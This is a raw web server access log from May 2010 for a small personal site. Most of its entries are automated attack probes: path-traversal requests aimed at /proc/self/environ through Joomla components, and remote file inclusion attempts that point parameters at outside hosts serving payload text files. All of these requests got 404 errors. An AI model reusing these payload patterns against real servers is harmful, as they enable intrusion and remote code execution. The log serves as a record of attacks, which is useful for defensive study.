91.121.145.89 - - [28/May/2010:05:58:11 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:58:11 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:05:58:11 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:05:58:11 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:05:58:11 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:05:58:11 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:05:58:11 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.176.6 - - [28/May/2010:05:58:11 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:05:58:11 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
114.108.151.149 - - [28/May/2010:05:58:48 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
114.108.151.149 - - [28/May/2010:05:58:48 -0500] "GET /logs/access_log.1271548800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
114.108.151.149 - - [28/May/2010:05:58:49 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
91.121.145.89 - - [28/May/2010:06:00:33 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:06:00:34 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:06:00:38 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:06:00:38 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
114.108.151.149 - - [28/May/2010:06:01:25 -0500] "GET /logs/access_log.1271462400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
114.108.151.149 - - [28/May/2010:06:01:37 -0500] "GET /logs/access_log.1272412800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
87.250.255.243 - - [28/May/2010:06:02:14 -0500] "GET /logs/access_log.1267488000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.53 - - [28/May/2010:06:03:58 -0500] "GET /logs/access_log.1223337600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.151.149 - - [28/May/2010:06:04:44 -0500] "GET /logs/access_log.1271462400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
114.108.151.149 - - [28/May/2010:06:04:55 -0500] "GET /logs/access_log.1272412800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
68.96.206.114 - - [28/May/2010:06:08:23 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?q=bert%20grimm%20tattoo%20flash&um=1&hl=en&safe=off&client=firefox-a&rls=org.mozilla:en-US:official&ndsp=20&ie=UTF-8&sa=N&tab=iw""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
68.96.206.114 - - [28/May/2010:06:08:24 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
68.96.206.114 - - [28/May/2010:06:08:24 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
68.96.206.114 - - [28/May/2010:06:08:27 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
207.46.13.92 - - [28/May/2010:06:08:29 -0500] "GET /logs/access_log.1260748800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.196.180.250 - - [28/May/2010:06:09:14 -0500] "GET //errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
213.196.180.250 - - [28/May/2010:06:09:14 -0500] "GET /logs//errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
204.93.174.47 - - [28/May/2010:06:10:30 -0500] "GET /logs/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:06:10:30 -0500] "GET /errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:06:10:30 -0500] "GET /logs/access_log.1271548800/errors.php?error=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:06:12:07 -0500] "GET /logs/access_log.1271462400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 366 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:06:12:07 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:06:12:07 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:06:12:19 -0500] "GET /logs/access_log.1272412800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 366 "-""Mozilla/5.0"
67.195.112.180 - - [28/May/2010:06:16:14 -0500] "GET /costume/shipping.htm HTTP/1.0" 404 292 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.44.120.3 - - [28/May/2010:06:17:11 -0500] "GET /logs/access_log.1270598400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.44.120.3 - - [28/May/2010:06:17:20 -0500] "GET /logs/access_log.1271548800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [28/May/2010:06:19:01 -0500] "GET /logs/access_log.1186099200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.193 - - [28/May/2010:06:19:27 -0500] "GET /logs/access_log.1224460800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.133.201.194 - - [28/May/2010:06:19:37 -0500] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.834"
174.133.201.194 - - [28/May/2010:06:19:37 -0500] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.834"
207.46.195.235 - - [28/May/2010:06:19:58 -0500] "GET /logs/access_log.1222992000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.97.239.115 - - [28/May/2010:06:20:05 -0500] "GET /logs/index.php?option=com_jeformcr&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.819"
216.97.239.115 - - [28/May/2010:06:20:05 -0500] "GET /index.php?option=com_jeformcr&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.819"
80.65.166.74 - - [28/May/2010:06:20:20 -0500] "GET /logs/index.php?option=com_jeformcr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
80.65.166.74 - - [28/May/2010:06:20:23 -0500] "GET /index.php?option=com_jeformcr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
207.46.13.84 - - [28/May/2010:06:20:29 -0500] "GET /logs/access_log.1165190400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
80.65.166.74 - - [28/May/2010:06:20:34 -0500] "GET /logs/index.php?option=com_jeformcr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
80.65.166.74 - - [28/May/2010:06:20:35 -0500] "GET /index.php?option=com_jeformcr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
204.93.174.47 - - [28/May/2010:06:21:09 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:06:21:09 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:06:21:09 -0500] "GET /logs/access_log.1273363200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
74.55.96.234 - - [28/May/2010:06:21:22 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:06:21:23 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:06:21:24 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:06:21:24 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
217.116.47.110 - - [28/May/2010:06:21:53 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
217.116.47.110 - - [28/May/2010:06:21:53 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
217.116.47.110 - - [28/May/2010:06:21:53 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
217.116.47.110 - - [28/May/2010:06:21:53 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.195.112.180 - - [28/May/2010:06:22:35 -0500] "GET /logs/access_log.1212278400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
204.93.174.47 - - [28/May/2010:06:22:49 -0500] "GET /logs/access_log.1274313600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
74.55.96.234 - - [28/May/2010:06:23:03 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:06:23:03 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
217.116.47.110 - - [28/May/2010:06:23:07 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
217.116.47.110 - - [28/May/2010:06:23:08 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
217.116.47.110 - - [28/May/2010:06:23:08 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
217.116.47.110 - - [28/May/2010:06:23:08 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.55.96.234 - - [28/May/2010:06:23:14 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:06:23:14 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:06:23:18 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:06:23:18 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:06:23:26 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:06:23:26 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
217.116.47.110 - - [28/May/2010:06:23:33 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
217.116.47.110 - - [28/May/2010:06:23:33 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
217.116.47.110 - - [28/May/2010:06:23:33 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
217.116.47.110 - - [28/May/2010:06:23:34 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
174.133.201.194 - - [28/May/2010:06:24:42 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.133.201.194 - - [28/May/2010:06:24:42 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.195.112.180 - - [28/May/2010:06:25:54 -0500] "GET /logs/access_log.1223424000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [28/May/2010:06:26:56 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [28/May/2010:06:26:56 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
204.93.174.47 - - [28/May/2010:06:27:13 -0500] "GET /logs/phphtml.php?htmlclass_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:06:27:13 -0500] "GET /logs/access_log.1271548800/phphtml.php?htmlclass_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:06:27:13 -0500] "GET /phphtml.php?htmlclass_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
207.46.204.235 - - [28/May/2010:06:27:58 -0500] "GET /logs/access_log.1195344000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.55.96.234 - - [28/May/2010:06:28:02 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:06:28:02 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:06:28:03 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:06:28:03 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
217.116.47.110 - - [28/May/2010:06:28:06 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
217.116.47.110 - - [28/May/2010:06:28:06 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
217.116.47.110 - - [28/May/2010:06:28:10 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
217.116.47.110 - - [28/May/2010:06:28:10 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:06:29:32 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:06:29:32 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
91.121.145.89 - - [28/May/2010:06:29:58 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:06:29:58 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:06:29:59 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:06:29:59 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.250.255.243 - - [28/May/2010:06:30:44 -0500] "GET /logs/access_log.1189987200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [28/May/2010:06:35:09 -0500] "GET /logs/access_log.1155340800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.55.96.234 - - [28/May/2010:06:35:27 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
